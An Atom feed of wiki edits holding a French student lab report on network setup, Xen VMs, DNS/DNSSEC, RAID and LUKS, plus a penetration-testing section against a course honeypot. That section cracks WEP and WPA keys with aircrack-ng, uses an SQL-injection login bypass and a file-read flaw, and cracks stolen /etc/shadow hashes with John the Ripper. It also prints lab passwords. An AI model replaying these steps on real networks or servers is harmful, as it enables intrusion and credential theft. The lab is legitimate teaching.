<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
		<id>https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Avercaem</id>
		<title>Wiki d'activités IMA - Contributions de l’utilisateur [fr]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Avercaem"/>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php/Sp%C3%A9cial:Contributions/Avercaem"/>
		<updated>2026-04-25T09:31:34Z</updated>
		<subtitle>Contributions de l’utilisateur</subtitle>
		<generator>MediaWiki 1.29.2</generator>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57941</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57941"/>
				<updated>2022-01-12T11:25:34Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
export https_proxy=https://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
=== Configuration IPV4 ===&lt;br /&gt;
&lt;br /&gt;
==== Paramétrage des VLANs ====&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==== OPSF ====&lt;br /&gt;
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
 router-id 10.00.0.1                                   &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
 summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
 redistribute connected subnets                       &lt;br /&gt;
 redistribute static subnets                                                                                                                         &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation ==&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On peut ensuite démarrer notre VM&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/AnosTeke.cfg&lt;br /&gt;
&lt;br /&gt;
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces&lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements&lt;br /&gt;
&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
On les configure DUMP disabled et Fsck 2.&lt;br /&gt;
On peut finalement lancer le MOUNT&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
et vérifier la bonne execution&lt;br /&gt;
 lsblk&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
sur le serveur nous pouvons vérifier que notre machine existe : &lt;br /&gt;
 xen-list-images | grep Name: %nom de la vm%&lt;br /&gt;
 lsblk | grep %nom de la vm%&lt;br /&gt;
et finalement pour lister les machines en fonctionnement&lt;br /&gt;
 xen list&lt;br /&gt;
&lt;br /&gt;
On peut ensuite se connecter à la machine&lt;br /&gt;
 xen console Anosteke&lt;br /&gt;
&lt;br /&gt;
On en profite pour ajouter un nouvel utilisateur&lt;br /&gt;
 sudo adduser pifou&lt;br /&gt;
&lt;br /&gt;
Et installer les paquets&lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get upgrade&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
On vérifie que OpenSSH est installé &lt;br /&gt;
 ssh -V&lt;br /&gt;
&lt;br /&gt;
Si il ne l'est pas on l'install. &lt;br /&gt;
 sudo apt install openssh-server&lt;br /&gt;
&lt;br /&gt;
Pour lancer et arreter le service SSH : &lt;br /&gt;
 sudo service ssh stop&lt;br /&gt;
 sudo service ssh start&lt;br /&gt;
&lt;br /&gt;
Pour desactiver le service : &lt;br /&gt;
 sudo systemctl disable ssh&lt;br /&gt;
&lt;br /&gt;
Pour connaitre l'état du service : &lt;br /&gt;
 sudo systemctl status ssh&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config&lt;br /&gt;
 /etc/ssh&lt;br /&gt;
 ├── ssh_config&lt;br /&gt;
 ├── sshd_config&lt;br /&gt;
 ├── ssh_host_rsa_key&lt;br /&gt;
 └── ssh_host_rsa_key.pub&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier on modifie les paramètres suivants : &lt;br /&gt;
 Port 22&lt;br /&gt;
 LogLevel VERBOSE&lt;br /&gt;
 PermitRootLogin no&lt;br /&gt;
 Banner /etc/ssh/banner&lt;br /&gt;
&lt;br /&gt;
On redemarre ensuite le service SSH&lt;br /&gt;
 systemctl reaload ssh.service&lt;br /&gt;
&lt;br /&gt;
=== Serveur DNS ===&lt;br /&gt;
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net&lt;br /&gt;
&lt;br /&gt;
On install :&lt;br /&gt;
 apt-get install bind9&lt;br /&gt;
On peut aussi installer le paquet dsnutils pour débugger le service DNS &lt;br /&gt;
&lt;br /&gt;
Configuration du fichier /etc/bind/named.conf.options&lt;br /&gt;
 listen-on {any;};&lt;br /&gt;
 //allow-recursion  {localhost;};&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le bind de notre nom de domaine.&lt;br /&gt;
 /etc/bind/db.anosteke59.site                        &lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 @       IN      SOA     (&lt;br /&gt;
                        ns.anosteke.site.&lt;br /&gt;
                        ns6.gandi.net.&lt;br /&gt;
                        2;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        )&lt;br /&gt;
&lt;br /&gt;
         IN      NS      ns6.gandi.net. &lt;br /&gt;
 www     IN      A       193.48.57.182&lt;br /&gt;
 ns      IN      CNAME   www&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On vérifie que la configuration est cohérente à l'aide de &lt;br /&gt;
 named-checkzone anosteke59.site /etc/bind/db.anosteke59.site &lt;br /&gt;
&lt;br /&gt;
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)&lt;br /&gt;
 nslookup anosteke59.site &lt;br /&gt;
 dig anosteke59.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de site par certificat ===&lt;br /&gt;
On crée une demande de certificat avec la commande : &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. &lt;br /&gt;
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
On ajoute à notre fichier named.conf.options les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
 dnssec-enable yes; //Activer le dnssec, même si déprécié sur notre version&lt;br /&gt;
 dnssec-validation yes; //FOrcer le dnssec&lt;br /&gt;
&lt;br /&gt;
On génère ensuite nos clés, dans un fichier connus&lt;br /&gt;
&lt;br /&gt;
 cd /etc/bind/master&lt;br /&gt;
 dnssec-keygen -a NSEC3RSASHA1 -b 2048 -n ZONE anosteke59.site &lt;br /&gt;
 //Kanosteke59.site.+007+15849&lt;br /&gt;
 dnssec-keygen -f KSK -a NSEC3RSASHA1 -b 4096 -n ZONE anosteke59.site&lt;br /&gt;
 //Kanosteke59.site.+007+60636&lt;br /&gt;
&lt;br /&gt;
ici on crée une clé pour du SHA-1&lt;br /&gt;
ON peut ensuite renommer les fichiers &lt;br /&gt;
 &lt;br /&gt;
 mv Kanosteke59.site.+007+60636.key  Kanosteke59.site.ksk.key&lt;br /&gt;
 mv Kanosteke59.site.+007+60636.private  Kanosteke59.site.ksk.private&lt;br /&gt;
 mv Kanosteke59.site.+007+15849.key  Kanosteke59.site.zsk.key&lt;br /&gt;
 mv Kanosteke59.site.+007+15849.private  Kanosteke59.site.zsk.private&lt;br /&gt;
&lt;br /&gt;
On ajoute dans la fin de définition du domaine :&lt;br /&gt;
&lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 &lt;br /&gt;
 ...&lt;br /&gt;
 &lt;br /&gt;
 $INCLUDE Kanosteke59.site.zsk.key&lt;br /&gt;
 $INCLUDE Kanosteke59.site.ksk.key&lt;br /&gt;
&lt;br /&gt;
On signe maintenant nos fichier de définition&lt;br /&gt;
 dnssec-signzone -o anosteke59.site  -k Kanosteke59.site.ksk anosteke59.site Kanosteke59.site.zsk&lt;br /&gt;
&lt;br /&gt;
On modifie ensuite notre fichier '/etc/bind/named.conf.options' pour pointer sur ce nouveau fichier signé&lt;br /&gt;
 zone &amp;quot;anosteke59.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/master/anosteke59.site.signed&amp;quot;;&lt;br /&gt;
         notify yes;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
j'ai vérifié la config final avec : https://dnssec-analyzer.verisignlabs.com/anosteke59.site&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Sur le serveur Xen, on créer nos volumes. &lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-1 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-2 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-3 storage&lt;br /&gt;
&lt;br /&gt;
Qu'on ajoute à la configuration de notre VM&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
Après un rédémarrage de la VM on execute &lt;br /&gt;
&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3&lt;br /&gt;
&lt;br /&gt;
On formate la partition:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :&lt;br /&gt;
&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
&lt;br /&gt;
et on valide les modifications:&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Pour démarrer, nous formatons la clé :&lt;br /&gt;
 mkfs.ext4 /dev/sdb&lt;br /&gt;
&lt;br /&gt;
A l'aide de ''cryptsetup'', nous initialisons la clé USB avec l'option luksFormat et choisissons un mot de passe :&lt;br /&gt;
 cryptsetup luksFormat /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous ouvrons ensuite notre partition chiffrée et créons le nom du volume : crypte &lt;br /&gt;
 cryptsetup luksOpen /dev/sdb crypte&lt;br /&gt;
Puis nous le formatons&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypte &lt;br /&gt;
&lt;br /&gt;
Nous montons ensuite la partition afin d'y ajouter un fichier test :&lt;br /&gt;
 mkdir /mnt/cryptUSB&lt;br /&gt;
 mount -t ext4 /dev/mapper/crypte /mnt/cryptUSB/&lt;br /&gt;
&lt;br /&gt;
Nous créons ce fichier test.txt en y inscrivant &amp;quot;BONJOUR MONDE !&amp;quot; :&lt;br /&gt;
 nano /mnt/cryptUSB/test.txt&lt;br /&gt;
&lt;br /&gt;
Enfin, nous démontons et fermons le volume chiffré :&lt;br /&gt;
 umount /mnt/cryptUSB&lt;br /&gt;
 cryptsetup luksClose crypte&lt;br /&gt;
&lt;br /&gt;
Afin de vérifier le cryptage de la clé, nous le mettons sur un autre PC. On se rend compte que le mot de passe est obligatoire pour accéder aux fichiers&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== WEP ===&lt;br /&gt;
On commence par casser la clé WEP.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
puis on lance &lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
3 représente la channel utilisée par l'ap (ici 3)&lt;br /&gt;
&lt;br /&gt;
Notre interface est renommée 'wlan0mon'.&lt;br /&gt;
Pour visualiser les paquets sniffés, on execute alors&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Après quelques minutes, on execute :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng dump*.cap&lt;br /&gt;
&lt;br /&gt;
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.&lt;br /&gt;
Notre clé est : 55:55:55:55:5A:BC:08:CB:A4:44:44:44:44&lt;br /&gt;
&lt;br /&gt;
=== WPA ===&lt;br /&gt;
&lt;br /&gt;
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Enfin, on lance la commande :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap&lt;br /&gt;
&lt;br /&gt;
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous réalisons une injection sql afin de récupérer la liste de tous les utilisateurs du site honey.plil.info. Nous choisissons comme utilisateur &amp;quot;' or 1=1; --&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Nous nous connectons avec le compte administrateur. Dans un des fichiers, nous trouvons des allusions à PHPMyAdmin.&lt;br /&gt;
De là, 3 menus, dont 2 sont intéressants. Dans l'onglet ''gestion des manuels'', on peut ajouter un fichier depuis le serveur.&amp;lt;br/&amp;gt;&lt;br /&gt;
Ainsi, nous avons ajouté le fichier /etc/phpmyadmin/config-db.php.&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Depuis la page ''Recherche d'un manuel'', nous avons pû télécharger ce fichier, qui nous a indiqué le mot de passe du compte phpmyadmin : '''gencovid19'''.&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
2. PHPMyAdmin&lt;br /&gt;
&lt;br /&gt;
Nous avons donc ouvert l'URL http://honey.plil.info/phpmyadmin dans un navigateur, et nous nous connectons avec le compte root:gencovid19&lt;br /&gt;
Dans PHPMyAdmin, nous trouvons un DB test avec des identifiants : rex:plainpassword &lt;br /&gt;
&lt;br /&gt;
3. Récupération de fichiers avec l'user rex&lt;br /&gt;
&lt;br /&gt;
Nous avons donc réussi à nous connecter en SSH au serveur, et nous avons récupéré les fichiers /etc/passwd et /etc/shadow.&amp;lt;br/&amp;gt;&lt;br /&gt;
Nous avons lancé la commande :&lt;br /&gt;
 unshadow /etc/passwd /etc/shadow | head -1 &amp;gt; mdp&lt;br /&gt;
Nous avons obtenu un fichier avec le mot de passe root haché.&lt;br /&gt;
&lt;br /&gt;
5. Decryptage du mot de passe root avec John the Ripper&lt;br /&gt;
&lt;br /&gt;
Pour casser le mot de passe, nous avons utilisé John the Ripper. Nous nous sommes aidé des indications : &amp;quot;mot de passe présentant les mêmes caractéristiques que le mot de passe root habituel&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
Nous avons créé un dictionnaire de mots de 4 lettres : &lt;br /&gt;
 crunch 4 4 abcdefghijklmnopqrstuvwxyz &amp;gt; dict&lt;br /&gt;
&lt;br /&gt;
Pour obtenir des mots de 8 lettres (en duplicant les mots de 4 lettres), nous avons utilisé sed : &lt;br /&gt;
 sed -i 's/\(.*\)/\1\1/'&lt;br /&gt;
La dernière étape consistait à lancer JtR :&lt;br /&gt;
 john -w:dict mdp&lt;br /&gt;
Après 5 minutes d'attente, le mot de passe vu cracké.&amp;lt;br/&amp;gt;&lt;br /&gt;
Avec la commande : &lt;br /&gt;
 john --show mdp&lt;br /&gt;
On obtient le mot de passe : '''fortfort'''.&lt;br /&gt;
&lt;br /&gt;
= ASR =&lt;br /&gt;
&lt;br /&gt;
 xl create -c PRA-07.cfg&lt;br /&gt;
&lt;br /&gt;
 xen console PRA-07&lt;br /&gt;
&lt;br /&gt;
on ajoute dans /etc/network/interfaces :&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 172.26.145.107/24&lt;br /&gt;
  gateway 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Et on commente relatif au DHCP&lt;br /&gt;
on édite /etc/ssh/sshd_config :&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
on copie la clé publique de la zabeth dans /root/.ssh/authorized_key&lt;br /&gt;
&lt;br /&gt;
on install puthon3-venv sur la zabeth :&lt;br /&gt;
 apt install python3-venv&lt;br /&gt;
&lt;br /&gt;
on install ansible sur les zabeth :&lt;br /&gt;
 python3 -m venv ~/env-ansible&lt;br /&gt;
 . ~/env-ansible/bin/activate&lt;br /&gt;
 pip3 install -U setuptools wheel&lt;br /&gt;
 pip3 install -U ansible&lt;br /&gt;
&lt;br /&gt;
On édite le fichier inventory de ansible :&lt;br /&gt;
 ASR-07 ansible_ssh_host=&amp;quot;172.26.145.107&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Passons maintenant à la configuration de ansible :&lt;br /&gt;
&lt;br /&gt;
On modifie la tache main.yml du role de base pour modifier la source de sécurité des paquets&lt;br /&gt;
&lt;br /&gt;
tache&lt;br /&gt;
 - name: &amp;quot;Fix BullsEye&amp;quot;&lt;br /&gt;
   copy: &lt;br /&gt;
     src: &amp;quot;{{ role_path }}/files/sources.list&amp;quot;&lt;br /&gt;
     dest: /etc/apt/&lt;br /&gt;
&lt;br /&gt;
sources.list&lt;br /&gt;
 deb     http://deb.debian.org/debian     bullseye main contrib non-free&lt;br /&gt;
 deb-src http://deb.debian.org/debian     bullseye main contrib non-free&lt;br /&gt;
 deb http://security.debian.org/debian-security bullseye-security main contrib non-free&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57908</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57908"/>
				<updated>2022-01-12T10:32:15Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* ASR */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Configuration IPV4 ===&lt;br /&gt;
&lt;br /&gt;
==== Paramétrage des VLANs ====&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==== OPSF ====&lt;br /&gt;
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
 router-id 10.00.0.1                                   &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
 summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
 redistribute connected subnets                       &lt;br /&gt;
 redistribute static subnets                                                                                                                         &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation ==&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On peut ensuite démarrer notre VM&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/AnosTeke.cfg&lt;br /&gt;
&lt;br /&gt;
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces&lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
